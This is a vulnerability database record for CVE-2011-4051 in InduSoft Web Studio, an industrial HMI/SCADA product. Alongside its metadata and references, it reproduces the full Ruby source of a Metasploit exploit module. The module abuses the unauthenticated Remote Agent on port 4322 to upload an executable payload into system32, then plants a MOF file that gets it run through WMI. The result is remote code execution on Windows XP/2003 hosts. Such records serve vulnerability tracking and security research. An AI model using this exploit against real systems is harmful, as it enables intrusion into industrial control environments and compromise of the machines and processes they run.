ID

VAR-E-201111-0106


CVE

cve_id:CVE-2011-4051

Trust: 2.4

sources: BID: 50675 // PACKETSTORM: 117113 // EXPLOIT-DB: 21837 // EDBNET: 44053

EDB ID

21837


TITLE

InduSoft Web Studio - Arbitrary File Upload / Remote Code Execution (Metasploit) - Windows remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 21837

DESCRIPTION

InduSoft Web Studio - Arbitrary File Upload / Remote Code Execution (Metasploit). CVE-2011-4051CVE-77179 . remote exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 21837

AFFECTED PRODUCTS

vendor:indusoftmodel:web studioscope: - version: -

Trust: 1.0

vendor:indusoftmodel:web studio arbitrary uploadscope: - version: -

Trust: 0.5

vendor:indusoftmodel:web studioscope:eqversion:7.0.104

Trust: 0.3

vendor:indusoftmodel:web studio 7.0b2 hotfixscope:eqversion:7.0.01.

Trust: 0.3

vendor:indusoftmodel:web studio 7.0b2scope: - version: -

Trust: 0.3

vendor:indusoftmodel:web studioscope:eqversion:7.0

Trust: 0.3

vendor:indusoftmodel:web studioscope:eqversion:6.1

Trust: 0.3

vendor:indusoftmodel:thin clientscope:eqversion:7.0

Trust: 0.3

sources: BID: 50675 // PACKETSTORM: 117113 // EXPLOIT-DB: 21837

EXPLOIT

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec

def initialize(info = {})
super(update_info(info,
'Name' => 'InduSoft Web Studio Arbitrary Upload Remote Code Execution',
'Description' => %q{
This module exploits a lack of authentication and authorization on the InduSoft
Web Studio Remote Agent, that allows a remote attacker to write arbitrary files to
the filesystem, by abusing the functions provided by the software.

The module uses uses the Windows Management Instrumentation service to execute an
arbitrary payload on vulnerable installations of InduSoft Web Studio on Windows pre
Vista. It has been successfully tested on InduSoft Web Studio 6.1 SP6 over Windows
XP SP3 and Windows 2003 SP2.
},
'Author' =>
[
'Luigi Auriemma', # Vulnerability Discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2011-4051' ],
[ 'OSVDB', '77179' ],
[ 'BID', '50675' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-330' ]
],
'Privileged' => true,
'Payload' =>
{
'BadChars' => "",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP / 2003', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 04 2011'))

register_options([Opt::RPORT(4322)], self.class)
end

def check
connect

# Get Application version
data = [0x14].pack("C")
sock.put(data)
app_info = sock.get_once
disconnect

if app_info =~ /InduSoft Web Studio v6\.1/
return Exploit::CheckCode::Vulnerable
elsif app_info =~ /InduSoft Web Studio/
return Exploit::CheckCode::Detected
end

return Exploit::CheckCode::Safe

end

def upload_file(filename, my_payload)
connect

# Get Application version
data = [0x14].pack("C")
sock.put(data)
app_info = sock.get_once
if app_info !~ /InduSoft Web Studio/
print_error("#{@peer} - InduSoft Web Sutio hasn't been detected, trying to exploit anyway...")
end

# Get Operating System
data = [0x13].pack("C")
sock.put(data)
os_info = sock.get_once
if os_info !~ /WINXP/ and os_info !~ /WIN2K3/
print_error("#{@peer} - Exploitation through Windows Management Instrumentation service only works on windows pre-vista system, trying to exploit anyway...")
end

# Upload file

data = "\x02\x37" # Command => Select destination
data << [my_payload.length].pack("V") # Data length
data << "#{filename}" # File name to upload
data << "\x09\x00\x30\x00\x00\x00"
data << "\x10\x03" # End of packet

# The data must be split on 1024 length chunks
offset = 0 # Data to send
count = 1 # Number of chunks sent
groups = 0 # Data must be sent in groups of 50 chunks

chunk = my_payload[offset, 1024]

while not chunk.nil?

# If there is a group of chunks, send it
if count % 51 == 0

data << "\x02\x2c" # Command => Send group of chunks
my_count = [count].pack("V") # Number of chunks
data << my_count.gsub(/\x10/, "\x10\x10")
data << "\x10\x03" # End of packet

sock.put(data)
res = sock.get_once
if res !~ /\x02\x06\x10\x03/
return res
end

count = count + 1
groups = groups + 1
data = ""

end

pkt = [ 0x02, 0x2e ].pack("C*") # Command => Chunk Data
my_count = [count].pack("V")
pkt << my_count.gsub(/\x10/, "\x10\x10") # Chunk ID
pkt << [chunk.length].pack("V").gsub(/\x10/, "\x10\x10") # Chunk Data length
pkt << chunk.gsub(/\x10/, "\x10\x10") # Chunk Data
pkt << "\x10\x03" # End of packet

data << pkt
offset = (count - groups) * 1024
chunk = my_payload[offset, 1024]
count = count + 1
end

pkt = [ 0x02, 0x03].pack("C*") # Command => End of File
my_count = [count].pack("V")
pkt << my_count.gsub(/\x10/, "\x10\x10") # Chunk ID
pkt << rand_text_alpha(8) # LastWriteTime
pkt << rand_text_alpha(8) # LastAccessTime
pkt << rand_text_alpha(8) # CreationTime
pkt << "\x20\x00\x00\x00" # FileAttributes => FILE_ATTRIBUTE_ARCHIVE (0x20)
pkt << rand_text_alpha(1)
pkt << "\x10\x03" # End of packet
data << pkt

sock.put(data)
res = sock.get_once
disconnect

return res

end

def exploit

@peer = "#{rhost}:#{rport}"

exe = generate_payload_exe
exe_name = rand_text_alpha(rand(10)+5) + '.exe'

mof_name = rand_text_alpha(rand(10)+5) + '.mof'
mof = generate_mof(mof_name, exe_name)

print_status("#{@peer} - Uploading the exe payload to C:\\WINDOWS\\system32\\#{exe_name}")
res = upload_file("C:\\WINDOWS\\system32\\#{exe_name}", exe)
if res =~ /\x02\x06\x10\x03/
print_good "#{@peer} - The exe payload has been uploaded successfully"
else
print_error "#{@peer} - Error uploading the exe payload"
return
end

print_status("#{@peer} - Uploading the mof file to c:\\WINDOWS\\system32\\wbem\\mof\\#{mof_name}")
res = upload_file("c:\\WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
if res =~ /\x02\x06\x10\x03/
print_good "#{@peer} - The mof file has been uploaded successfully"
else
print_error "#{@peer} - Error uploading the mof file"
return
end

end

end

Trust: 1.0

sources: EXPLOIT-DB: 21837

EXPLOIT LANGUAGE

rb

Trust: 0.6

sources: EXPLOIT-DB: 21837

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 21837

TYPE

Arbitrary File Upload / Remote Code Execution (Metasploit)

Trust: 1.0

sources: EXPLOIT-DB: 21837

TAGS

tag:Metasploit Framework (MSF)

Trust: 1.0

tag:exploit

Trust: 0.5

tag:remote

Trust: 0.5

tag:web

Trust: 0.5

tag:arbitrary

Trust: 0.5

sources: PACKETSTORM: 117113 // EXPLOIT-DB: 21837

CREDITS

Metasploit

Trust: 0.6

sources: EXPLOIT-DB: 21837

EXTERNAL IDS

db:ZDIid:ZDI-11-330

Trust: 2.7

db:NVDid:CVE-2011-4051

Trust: 2.4

db:EXPLOIT-DBid:21837

Trust: 1.6

db:0DAYTODAYid:19508

Trust: 0.6

db:EDBNETid:19470

Trust: 0.6

db:EDBNETid:44053

Trust: 0.6

db:PACKETSTORMid:117113

Trust: 0.5

db:ICS CERTid:ICSA-11-319-01

Trust: 0.3

db:BIDid:50675

Trust: 0.3

sources: BID: 50675 // PACKETSTORM: 117113 // EXPLOIT-DB: 21837 // EDBNET: 19470 // EDBNET: 44053

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2011-4051

Trust: 2.1

url:http://www.zerodayinitiative.com/advisories/zdi-11-330

Trust: 1.0

url:https://0day.today/exploits/19508

Trust: 0.6

url:https://www.exploit-db.com/exploits/21837/

Trust: 0.6

url:http://www.us-cert.gov/control_systems/pdf/icsa-11-319-01.pdf

Trust: 0.3

url:http://www.indusoft.com/mainpage.php?aricleid=17&type=certified/hardware

Trust: 0.3

sources: BID: 50675 // PACKETSTORM: 117113 // EXPLOIT-DB: 21837 // EDBNET: 19470 // EDBNET: 44053

SOURCES

db:BIDid:50675
db:PACKETSTORMid:117113
db:EXPLOIT-DBid:21837
db:EDBNETid:19470
db:EDBNETid:44053

LAST UPDATE DATE

2022-07-27T09:43:04.709000+00:00


SOURCES UPDATE DATE

db:BIDid:50675date:2012-10-04T10:30:00

SOURCES RELEASE DATE

db:BIDid:50675date:2011-11-15T00:00:00
db:PACKETSTORMid:117113date:2012-10-04T03:55:20
db:EXPLOIT-DBid:21837date:2012-10-10T00:00:00
db:EDBNETid:19470date:2012-10-04T00:00:00
db:EDBNETid:44053date:2012-10-10T00:00:00